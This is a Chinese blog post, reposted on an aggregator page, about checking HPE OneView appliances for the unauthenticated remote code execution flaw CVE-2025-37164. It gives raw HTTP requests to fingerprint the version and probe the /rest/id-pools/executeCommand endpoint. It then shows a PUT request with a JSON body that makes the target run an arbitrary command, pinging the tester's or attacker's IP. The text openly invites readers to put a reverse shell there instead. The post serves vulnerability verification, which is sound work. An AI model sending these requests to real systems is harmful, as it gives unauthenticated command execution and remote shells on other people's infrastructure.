当前位置: 首页 > news >正文

HPE OneView高危漏洞CVE-2025-37164剖析:未经认证的远程代码执行

CVE-2025–37164:影响Hewlett Packard Enterprise OneView的严重未认证RCE漏洞

在这篇简短的博客中,我们来讨论验证主机是否易受CVE-2025–37164攻击的选项。CVE-2025–37164是一个未认证的远程代码执行漏洞,影响11.0版本之前的HPE OneView软件。该RCE之所以可能,是由于“/rest/id-pools/executeCommand”端点存在一个典型的类型混淆RCE漏洞。

所有早于11.00且未应用相关热修复补丁的版本均受影响。由于漏洞位于“/rest/id-pools/executeCommand”端点,因此该端点不存在的虚拟机不受影响。根据我的初步测试,一些ESXi和Hyper-V虚拟机似乎不易受攻击(但我强烈建议在你的环境中交叉检查以确认该端点是否启用)。我还没有机会在KVM虚拟机上测试此漏洞的利用。

据报道,所有运行在HPE Synergy Composer上的OneView软件也受影响。我同样没有机会对此进行验证(需要一个设备 😃 )。

在下面的图片中,我们使用了用于ESXi虚拟机的HPE OneView版本10.20.00.xxx。
GET /rest/appliance/version HTTP/1.1
Host: <targethosthere>
User-Agent: rootaddict
Accept: */*
Connection: keep-alive
(此处为图片占位符,说明:上图显示的测试ESXi虚拟机版本为10.20.00.xxx)

调用易受攻击的端点只会显示HTTP响应404。
PUT /rest/id-pools/executeCommand HTTP/1.1
Host: <targethosthere>
User-Agent: rootaddict
Content-Type: application/json
Content-Length: 33
Connection: keep-alive
{"cmd":"commandhere","result":false}
(此处为图片占位符,说明:上图显示,在测试的VMWare ESXi虚拟机中,该端点不存在)

在下面的图片中,我们使用了用于Hyper-V虚拟机的HPE OneView版本10.20.00.xxx。
(此处为图片占位符,说明:图片显示了用于Hyper-V虚拟机的HPE OneView版本10.20.00)

下面的响应同样返回HTTP响应404。
(此处为图片占位符,说明:在Hyper-V VM的10.20.00版本中,易受攻击的端点不存在)

在下面的图片中,我们使用了用于Hyper-V虚拟机的HPE OneView版本06.60.07.xxx。
(此处为图片占位符,说明:图片显示了用于Hyper-V虚拟机的HPE OneView版本6.60.07)

现在,向易受攻击端点发送的GET请求返回HTTP响应401而不是404,这表明在该软件版本中易受攻击的端点已启用。
GET /rest/id-pools/executeCommand HTTP/1.1
Host: <yourtargethosthere>
User-Agent: rootaddict
Accept: */*
Connection: keep-alive
(此处为图片占位符,说明:上图显示了不同的HTTP响应,不是404而是401)

通过调用目标主机执行一些命令来确认漏洞。在下面的示例中,我们仅使用了Ping命令。在你的用例中,可以随意设置反向Shell。
PUT /rest/id-pools/executeCommand HTTP/1.1
Host: <targethosthere>
User-Agent: rootaddict
Content-Type: application/json
Content-Length: 46
Connection: keep-alive
{"cmd":"ping <tester's/attacker'sIPhere>","result":false}
(此处为图片占位符,说明:上图显示测试者试图调用目标主机执行ping命令)

下面的图片显示目标主机成功执行了ping命令,确认目标主机既存在漏洞又可被利用。
(此处为图片占位符,说明:图片显示目标主机确实执行了ping命令。)

参考链接:

  • https://nvd.nist.gov/vuln/detail/CVE-2025-37164
  • https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us&docLocale=en_US
  • https://thehackernews.com/2025/12/hpe-oneview-flaw-rated-cvss-100-allows.html
  • https://myenterpriselicense.hpe.com/cwp-ui/product-details/HPE_OV_CVE_37164_Z7550-98077/-/sw_free
  • https://www.rapid7.com/blog/post/etr-cve-2025-37164-critical-unauthenticated-rce-affecting-hewlett-packard-enterprise-oneview/

免责声明:
本博客提供的信息仅用于一般性参考。虽然我总是力求准确,但某些细节可能不准确,提供的列表也可能不完整。尽管如此,我强烈建议在做出任何决定或采取行动之前,依据行业标准文件和官方来源(上面参考部分列出了一些)核实任何关键信息。
此处表达的所有观点均是我个人的,不代表我的雇主的观点或立场。
CSD0tFqvECLokhw9aBeRqtTv15RNmaHdiNZPviuVo93sSoZJ811tDb5XudC7fhF8Sry89Uj5TnG+CWCdS0uO8yyO5NQlMh0oTHmMXSTZk3bna+MOQoPowha6TFDBHUrW3M1FdpBAsvZYVhNCY2SgRR4emYEzvJSXet9PUb5o9dc3akYrq4WQW5kk6t6O56Nb
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

公众号二维码

公众号二维码

http://www.jsqmd.com/news/173249/

相关文章:

  • jQuery 杂项方法
  • 学长亲荐8个AI论文软件,助你轻松搞定本科论文!
  • C 标准库 - `<stdarg.h>`
  • 期货反向跟单—从小白到高手进阶历程 六十二(期货交易中的逆向智慧)
  • 【课程设计/毕业设计】基于SpringBoot的广西旅游景点数据分析系统与设计【附源码、数据库、万字文档】
  • 牙齿拥挤数据集3206张VOC+YOLO格式
  • 12月第三篇笔记
  • 5种学生行为检测数据集2262张VOC+YOLO格式
  • 盘点2025磁性材料/器件上市企业扩产投资动向
  • 12月读书笔记-3
  • 半导体行业2025年最便宜10款MCU芯片
  • Kafka Connect x AutoMQ: Zero Cross-AZ Data Pipeline
  • CSDN年度技术趋势预测文章大纲
  • [特殊字符] 庆祝 AutoMQ 在 GitHub 上突破 9k Stars!
  • 12款WebGIS 开发开源框架及性能
  • 私有部署问卷系统操作实战记录-DWSurvey
  • Day 51 在预训练 ResNet18 中注入
  • 拉链用一年就坏?一件好羽绒服的“隐形品质”,都藏在这三个细节里!
  • WebGIS开发智慧校园(1)GIS开发的基本概念
  • C#上位机大数据量处理:异步采集+多线程解析
  • 洞察趋势:低代码如何驱动企业数字化转型效率提升?
  • 西电考研 | 26官方复试专业课参考书目汇总,强烈推荐!
  • DeepSeek总结的SQL 数独:约束编程
  • Redis Cluster:从数据分布到故障转移的全方位解读
  • 【毕业设计】基于Springboot的牧场管理系统的设计与实现(源码+文档+远程调试,全bao定制等)
  • Java计算机毕设之基于Springboot的牧场管理系统的设计与实现养殖管理记录牲畜档案(完整前后端代码+说明文档+LW,调试定制等)
  • 【JetCompose】入门教程实战基础案例02之列表项显隐效果
  • 【JetCompose】入门教程实战基础案例03之凡尔赛朋友圈
  • 高频Robot Framework软件测试面试题
  • 全面讲解并发编程模式,重点分析其在 .NET 中的实现